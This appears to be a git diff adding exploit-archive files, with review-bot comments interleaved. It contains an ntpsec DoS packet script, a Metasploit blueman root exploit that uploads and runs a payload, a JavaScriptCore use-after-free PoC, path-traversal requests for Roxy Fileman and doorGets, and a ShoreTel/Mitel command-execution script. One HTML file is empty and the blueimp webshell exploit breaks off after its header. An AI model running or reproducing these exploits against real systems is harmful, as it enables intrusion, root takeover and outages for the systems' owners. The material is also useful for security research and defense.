@@ -0,0 +1,49 @@ +#!/usr/bin/env python +# Exploit Title: ntpsec 1.1.2 authenticated out of bounds write proof of concept DoS +# Bug Discovery: Magnus Klaaborg Stubman (@magnusstubman) +# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman) +# Website: https://dumpco.re/bugs/ntpsec-authed-oobwrite +# Vendor Homepage: https://ntpsec.org/ +# Software Link: ftp://ftp.ntpsec.org/pub/releases/ntpsec-1.1.2.tar.gz +# Affected versions: all versions of ntpsec including, and prior to 1.1.2. +# CVE: CVE-2019-6442 +# Note: this PoC uses Keyid 1 with password ‘gurka’ + +import sys +import socket + +buf = ("\x16\x08\x00\x03\x00\x00\x00\x00\x00\x00\x01\xd4\x6c\x65\x61\x6d" + + "\x3d\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x42\x42\x42\x42\x42" + + "\x42\x42\x42\x42\x42\x41\x41\x41\x41\x41\x41\x41\x34\x41\x41\x42" + + "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x41\x41\x41\x41\x41\x41\x41" + + "\x41\x41\x41\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x41\x41\x41" + + "\x42\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x42\x42\x42\x42\x42" + + "\x42\x42\x42\x42\x42\x31\x32\x33\x34\x35\x3e\x37\x38\x39\x30\x31" + + "\x32\x33\x34\x35\x36\x37\x38\x39\x30\x31\x32\x33\x34\x35\x36\x37" + + "\x38\x39\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x20\x2d\x36\x33" + + "\x34\x35\x36\x37\x38\x39\x30\x31\x32\x38\x3d\x20\x2d\x36\x4a\x0a" + + "\x0a\x0a\x0a\x0a\x64\x0a\x0a\x0a\x0a\x2b\x0a\x0a\x0a\x34\x35\x36" + + "\x37\x38\x39\x0a\x0a\x0a\x26\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a" + + "\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x09\x0a\x0a\x0a\x0a\x0a\x0a" + + "\x42\x42\x42\x54\x42\x42\x41\x41\x41\x34\x41\x41\x42\x42\x42\x42" + + "\x42\x42\x42\x42\x42\x42\x41\x41\x41\x0a\x2b\x0a\x0a\x0a\x0a\x41" + + "\x0a\x2b\x0a\x0a\x0a\x0a\x0a\x0a\x64\x0a\x0a\x0a\x0a\x2b\x0a\x0a" + + "\x41\x41\x41\x41\x57\x41\x42\x42\x42\x42\x42\x42\x42\x42\x25\x42" + + "\x42\x41\x41\x41\x0a\xae\x4a\x0a\x0a\x0a\x0a\x0a\x64\x0a\x0a\x08" + + "\x0a\x2b\x0a\x0a\x0a\x34\x35\x36\x37\x38\x39\x0a\x0a\x0a\x26\x0a" + + 
"\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a" + + "\x0a\x09\x0a\x0a\x0a\x0a\x0a\x0a\x42\x42\x42\x54\x42\x42\x41\x41" + + "\x41\x34\x41\x41\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x41\x41" + + "\x41\x0a\x2b\x0a\x0a\x0a\x0a\x41\x0a\x2b\x0a\x0a\x0a\x0a\x0a\x0a" + + "\x64\x0a\x0a\x0a\x0a\x2b\x0a\x0a\x41\x41\x41\x41\x57\x41\x42\x42" + + "\x42\x42\x42\x42\x42\x42\x42\x42\x41\x41\x41\x0a\x0a\x42\x42\x42" + + "\x41\x41\x41\x0a\x2b\x0a\x0a\x0a\x0a\x0a\x0a\x64\x41\x41\x41\x43" + + "\x57\x41\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x41\x41\x41\x0a" + + "\x0a\x0a\x05\xff\xff\x05\x0a\x64\x1b\x0a\x0a\x0a\x2b\x0a\x0a\x0a" + + "\x0a\x0a\x41\x41\x41\x41\x41\x41\x41\x41\x41\x33\x34\x00\x00\x00" + + "\x80\x39\x30\x20\x32\x33\x34\x35\x36\x37\x38\x39\x30\x41\x5b\x41" + + "\x00\x00\x00\x01\x8f\x2c\x6e\x5b\x49\xe7\xa0\x78\xa1\x9b\x50\xf5" + + "\xb2\x18\x04\x00") + +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +sock.sendto(buf, ('127.0.0.1', 123)) \ No newline at end of file diff --git a/exploits/linux/local/46186.rb b/exploits/linux/local/46186.rb new file mode 100755 index 000000000..53d5a56d9 --- /dev/null +++ b/exploits/linux/local/46186.rb 
@@ -0,0 +1,161 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Post::File + include Msf::Post::Linux::Priv + include Msf::Post::Linux::System + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'blueman set_dhcp_handler D-Bus Privilege Escalation', + 'Description' => %q{ + This module attempts to gain root privileges by exploiting a Python + code injection vulnerability in blueman versions prior to 2.0.3. + + The `org.blueman.Mechanism.EnableNetwork` D-Bus interface exposes the + `set_dhcp_handler` function which uses user input in a call to `eval`, + without sanitization, resulting in arbitrary code execution as root. + + This module has been tested successfully with blueman version 1.23 + on Debian 8 Jessie (x64). + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'the grugq', # Discovery and exploit + 'bcoles' # Metasploit + ], + 'DisclosureDate' => '2015-12-18', + 'References' => + [ + ['BID', '79688'], + ['CVE', '2015-8612'], + ['URL', 'https://twitter.com/thegrugq/status/677809527882813440'], + ['URL', 'https://github.com/blueman-project/blueman/issues/416'], + ['URL', 'https://www.openwall.com/lists/oss-security/2015/12/18/6'], + ['URL', 'https://www.debian.org/security/2015/dsa-3427'], + ['URL', 'https://bugs.mageia.org/show_bug.cgi?id=17361'], + ['URL', 'http://www.slackware.com/security/viewer.php?l=slackware-security&y=2015&m=slackware-security.421085'] + ], + 'Platform' => ['linux'], + 'Arch' => + [ + ARCH_X86, + ARCH_X64, + ARCH_ARMLE, + ARCH_AARCH64, + ARCH_PPC, + ARCH_MIPSLE, + ARCH_MIPSBE + ], + 'SessionTypes' => ['shell', 'meterpreter'], + 'Targets' => [['Auto', {}]], + 'DefaultTarget' => 0)) + register_advanced_options [ + OptBool.new('ForceExploit', [false, 'Override check result', 
false]), + OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) + ] + end + + def base_dir + datastore['WritableDir'].to_s + end + + def upload(path, data) + print_status "Writing '#{path}' (#{data.size} bytes) ..." + rm_f path + write_file path, data + register_file_for_cleanup path + end + + def upload_and_chmodx(path, data) + upload path, data + chmod path + end + + def dbus_send(dest:, type:, path:, interface:, contents:) + cmd_exec "dbus-send --system --print-reply --dest=#{dest} --type=#{type} #{path} #{interface} #{contents}" + end + + def check + unless command_exists? 'dbus-send' + vprint_error 'dbus-send is not installed. Exploitation will fail.' + return CheckCode::Safe + end + vprint_good 'dbus-send is installed' + + res = dbus_send( + dest: 'org.blueman.Mechanism', + type: 'method_call', + path: '/', + interface: 'org.freedesktop.DBus.Introspectable.Introspect', + contents: '' + ) + + unless res.include? 'EnableNetwork' + vprint_error 'org.blueman.Mechanism.EnableNetwork D-Bus interface is not available' + return CheckCode::Safe + end + vprint_good 'org.blueman.Mechanism.EnableNetwork D-Bus interface is available' + + res = execute_python('') + unless res.include? 'eval("nc.set_dhcp_handler(%s)" % dhcp_handler)' + vprint_error 'Target is not vulnerable' + return CheckCode::Safe + end + + CheckCode::Vulnerable + end + + def execute_python(code) + dbus_send( + dest: 'org.blueman.Mechanism', + type: 'method_call', + path: '/', + interface: 'org.blueman.Mechanism.EnableNetwork', + contents: "'string:[]' 'string:[]' 'string:#{code}'" + ) + end + + def exploit + unless check == CheckCode::Vulnerable + unless datastore['ForceExploit'] + fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' + end + print_warning 'Target does not appear to be vulnerable' + end + + if is_root? + unless datastore['ForceExploit'] + fail_with Failure::BadConfig, 'Session already has root privileges. 
Set ForceExploit to override.' + end + end + + unless writable? base_dir + fail_with Failure::BadConfig, "#{base_dir} is not writable" + end + + payload_name = ".#{rand_text_alphanumeric 10..15}" + payload_path = "#{base_dir}/#{payload_name}" + upload_and_chmodx payload_path, generate_payload_exe + + print_status 'Executing payload...' + res = execute_python "os.system(\"#{payload_path}&\")" + vprint_line res + + unless res.include? 'eval("nc.set_dhcp_handler(%s)" % dhcp_handler)' + fail_with Failure::NotVulnerable, 'The target is not vulnerable' + end + + if res.include? 'SyntaxError:' + fail_with Failure::Unknown, 'Payload execution failed due to syntax error' + end + end +end \ No newline at end of file diff --git a/exploits/multiple/dos/46181.html b/exploits/multiple/dos/46181.html new file mode 100644 index 000000000..fdbac0830 --- /dev/null +++ b/exploits/multiple/dos/46181.html @@ -0,0 +1,34 @@ + + + + + + + + + \ No newline at end of file diff --git a/exploits/multiple/dos/46183.js b/exploits/multiple/dos/46183.js new file mode 100644 index 000000000..204bc0a89 --- /dev/null +++ b/exploits/multiple/dos/46183.js 
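Review bot: `check` is not a passive probe: after the introspection call it runs `execute_python('')`, which really invokes `org.blueman.Mechanism.EnableNetwork` over D-Bus with empty arguments and keys on the `eval("nc.set_dhcp_handler(%s)" % dhcp_handler)` text in the reply, so running `check` alone already produces a mechanism call and a Python traceback on the target; the Description should state this (e.g. `Note: the check method invokes EnableNetwork and is therefore not passive.`). Separately, `payload_path` is interpolated unescaped into the single-quoted `'string:#{code}'` argument that `dbus_send` hands to `cmd_exec`, and `base_dir` comes straight from the `WritableDir` option, so a value containing `'`, `"` or `$` corrupts the command line; a `fail_with Failure::BadConfig` unless `base_dir =~ %r{\A[\w./-]+\z}` next to the `writable?` check would guard it. Finally, `dbus_send` returns raw `cmd_exec` output and the callers only test `include?`, so a `dbus-send` invocation that fails outright (no system bus, permission denied) is reported as "not vulnerable" rather than as an error — a `vprint_error res` on that path would make the difference visible.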
@@ -0,0 +1,58 @@ +/* +The doesGC function simply takes a node, and tells if it might cause a garbage collection. This function is used to determine whether to insert write barriers. But it's missing GetIndexedPropertyStorage that can cause a garbage collection via rope strings. As a result, it can lead to UaF. + +PoC: +*/ + +function gc() { + for (let i = 0; i < 10; i++) { + new ArrayBuffer(1024 * 1024 * 10); + } +} + +function opt(arr) { + let r = /a/; + let o = {}; + + arr[0].charAt(0); + arr[1].charAt(0); + arr[2].charAt(0); + arr[3].charAt(0); + arr[4].charAt(0); + arr[5].charAt(0); + arr[6].charAt(0); + arr[7].charAt(0); + arr[8].charAt(0); + arr[8].charAt(0); + arr[9].charAt(0); + + o.x = 'a'.match(r); + + return o; +} + +function main() { + for (let i = 0; i < 10000; i++) { + opt(['a' + i, 'b' + i, 'c' + i, 'd' + i, 'e' + i, 'f' + i, 'g' + i, 'h' + i, 'i' + i, 'j' + i]); + } + + let a = 'a'.repeat(1024 * 1024 * 2); + let b = 'a'.repeat(1024 * 1024 * 2); + + let arr = []; + for (let i = 0; i < 10; i++) { + arr[i] = a + b; + } + + gc(); + + let o = opt(arr); + + gc(); + + let tmp = [1234]; + + print(o.x); // 1234 +} + +main(); \ No newline at end of file diff --git a/exploits/php/webapps/46172.txt b/exploits/php/webapps/46172.txt new file mode 100644 index 000000000..c3e05dd6b --- /dev/null +++ b/exploits/php/webapps/46172.txt 
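Review bot: Nothing in the header comment says this PoC targets the JavaScriptCore shell, yet the last statement is `print(o.x)` — `print` is a `jsc` shell builtin, not a browser API, so the file throws a ReferenceError in a page context; add `// Run under the jsc shell: print() is a shell builtin` to the leading comment. In `opt`, `arr[8].charAt(0)` appears twice in a row while every other index appears once, which reads like a copy-paste slip; if the repetition is intentional a comment should say so. `let tmp = [1234];` is never referenced, so the `// 1234` on the next line is the only hint of its role — a short comment on why `tmp` is allocated at that point would make the expected output self-explaining.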
@@ -0,0 +1,38 @@ +# Exploit Title: Roxy Fileman 1.4.5 - Arbitrary File Download +# Dork: N/A +# Date: 2019-01-16 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://www.roxyfileman.com/ +# Software Link: http://www.roxyfileman.com/download.php?f=1.4.5-php +# Version: 1.4.5 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/fileman/php/download.php?f=/[PATH]/fileman/Uploads/[FILE] +# + +GET /[PATH]/fileman/php/download.php?f=%2FExploitDb%2FRoxyFileman-1.4.5-php%2Ffileman%2FUploads%2F%2F%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows/win.ini HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=2lj2q69rvodstr9g2c9ki3k3j6; GeniXCMS-Installation=rsb95ndeo38fi0qo5376ku0o74; GeniXCMS-uxTCOmgGby9cYrSEFhS2=iuac7ooh77hghvbq7afkn0kl13; roxyld=%2FExploitDb%2FRoxyFileman-1.4.5-php%2Ffileman%2FUploads; roxyview=list +DNT: 1 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +HTTP/1.1 200 OK +Date: Tue, 15 Jan 2019 22:19:32 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Disposition: attachment; filename="win.ini" +Content-Length: 564 +Keep-Alive: timeout=5, max=99 +Connection: Keep-Alive +Content-Type: application/force-download \ No newline at end of file diff --git a/exploits/php/webapps/46173.txt b/exploits/php/webapps/46173.txt new file mode 100644 index 000000000..fa64da605 --- /dev/null +++ b/exploits/php/webapps/46173.txt 
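Review bot: The `Cookie:` header in the captured request still carries what appear to be live session identifiers from the author's test host (`PHPSESSID=...` and two `GeniXCMS-*` cookies) even though `Host:` has already been replaced with `TARGET`; cookies that are not part of the Roxy Fileman request should be redacted to a placeholder in the same way, so the capture shows only what the advisory is demonstrating. The same request/response pair is repeated in 46173.txt (doorGets CMS 7.0) with only the path prefix changed, which suggests doorGets bundles the same Roxy Fileman component; if so, the two advisories should cross-reference each other and the doorGets header should name the bundled component and its version.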
@@ -0,0 +1,38 @@ +# Exploit Title: doorGets CMS 7.0 - Arbitrary File Download +# Dork: N/A +# Date: 2019-01-16 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://www.doorgets.com/ +# Software Link: https://netix.dl.sourceforge.net/project/doorgets-cms/doorGets%20CMS%20V7/doorGets_CMS_V7.0.zip +# Version: 7.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/fileman/php/download.php?f=/[PATH]/fileman/Uploads/[FILE] +# + +GET /[PATH]/fileman/php/download.php?f=%2FExploitDb%2FdoorGets_CMS_V7.0%2Ffileman%2FUploads%2F%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows/win.ini HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=2lj2q69rvodstr9g2c9ki3k3j6; GeniXCMS-Installation=rsb95ndeo38fi0qo5376ku0o74; GeniXCMS-uxTCOmgGby9cYrSEFhS2=iuac7ooh77hghvbq7afkn0kl13; roxyld=%2FExploitDb%2FdoorGets_CMS_V7.0%2Ffileman%2FUploads; roxyview=list +DNT: 1 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +HTTP/1.1 200 OK +Date: Tue, 15 Jan 2019 22:03:21 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Disposition: attachment; filename="win.ini" +Content-Length: 564 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: application/force-download \ No newline at end of file diff --git a/exploits/php/webapps/46174.txt b/exploits/php/webapps/46174.txt new file mode 100644 index 000000000..cf67e9edb --- /dev/null +++ b/exploits/php/webapps/46174.txt 
@@ -0,0 +1,66 @@
+# Exploit Title: ShoreTel / Mitel Connect ONSITE ST14.2 Remote Code Execution
+# Google Dork: +"Public" +"My Conferences" +"Personal Library" +"My Profile" +19.49.5200.0
+# Date: 01-01-2019
+# Exploit Author: twosevenzero
+# Vendor Homepage: https://www.mitel.com/
+# Version: 19.49.5200.0 (and very likely many others prior and after)
+# CVE : CVE-2018-5782 ( https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5782)
+
+Description
+===========
+There are multiple vulnerabilities in ShoreTel/Mitel Connect ONSITE ST 14.2
+which, when chained together, result in remote code execution in the
+context of the running service. The vendor was contacted by Jared McLaren
+of SecureWorks in early 2018 but a proof of concept was not released. I had
+access to a single device during the development of this exploit. As such,
+your system paths may be different and you may need to edit this script to
+fit your needs.
+
+Solution
+========
+The vendor has released a response stating that the newest versions are not
+affected. Please see their response for upgrade instructions.
+
+https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-18-0004
+
+#!/usr/bin/env ruby
+
+require "base64"
+require "methadone"
+require "faraday"
+
+include Methadone::Main
+include Methadone::CLILogging
+
+main do |base_url,command|
+
+ cmd_b64 = Base64.strict_encode64(command.strip)
+
+ conn = Faraday.new(:url => base_url.strip)
+ res = conn.get do |req|
+ req.url "/scripts/vsethost.php",
+ {
+ :hostId => "system",
+ :keyCode => "base64_decode",
+ :meetingType => "{${gKeyCode}($gSessionDir)}",
+ :sessionDir => cmd_b64,
+ :swfServer => "{${gHostID}($gMeetingType)}",
+ :server => "exec",
+ :dir => "/usr/share/apache2/htdocs/wc2_deploy/scripts/"
+ }
+ end
+
+ rce = conn.get do |req|
+ req.url "/scripts/vmhost.php"
+ end
+
+ print rce.body.to_s
+end
+
+version "0.1.0"
+description "Shoretel/Mitel Connect Onsite ST 14.2 Remote Code Execution PoC"
+
+arg :base_url, "URL of vulnerable Connect Onsite ST 14.2 Installation."
+arg :command, "Command to run."
+
+go!
\ No newline at end of file
diff --git a/exploits/php/webapps/46182.py b/exploits/php/webapps/46182.py
new file mode 100755
index 000000000..1883b416f
--- /dev/null
+++ b/exploits/php/webapps/46182.py
@@ -0,0 +1,103 @@
+# Exploit Title: Exploit for Blueimp's jQuery File Upload <= 9.22.0 CVE-2018-9206
+# Google Dork: inurl: /jquery-file-upload/server/php
+# Date: 1/15/2019
+# Exploit Author: Larry W. Cashdollar
+# Vendor Homepage: http://www.vapidlabs.com
+# Software Link: [download link if available]
+# Version: <= 9.22.0
+# Tested on: Linux
+# CVE : CVE-2018-9206
+
+
+/*Exploits CVE-2018-9206 to install a webshell.*/
+/*http://www.vapidlabs.com/advisory.php?v=204 */
+/*$ gcc main.c -o blue_exploit */
+/*Larry W. Cashdollar @_larry0*/
+
+#include
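Review bot: The Solution section points at the vendor advisory but gives no detection guidance, even though the request the script sends is distinctive enough to log-hunt for: a request to `/scripts/vsethost.php` whose `meetingType` and `swfServer` parameters carry `{${…}}` template expressions, followed shortly by a fetch of `/scripts/vmhost.php`; a short "Detection" paragraph stating that would make the write-up useful to the people who have to find past abuse. In the script itself, `res` from the first `conn.get` is assigned and never read, and `rce.body` is printed unconditionally, so on a patched target or one with a different install path (the description itself warns the paths may differ) the output is whatever `vmhost.php` returns with no hint that the setup request failed — either drop the `res =` binding or check `res.success?` before the second request. The hard-coded `:dir` value is also the one place the "edit this script" advice applies, and a comment such as `# adjust to the scripts directory of the target install` next to it would say so.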
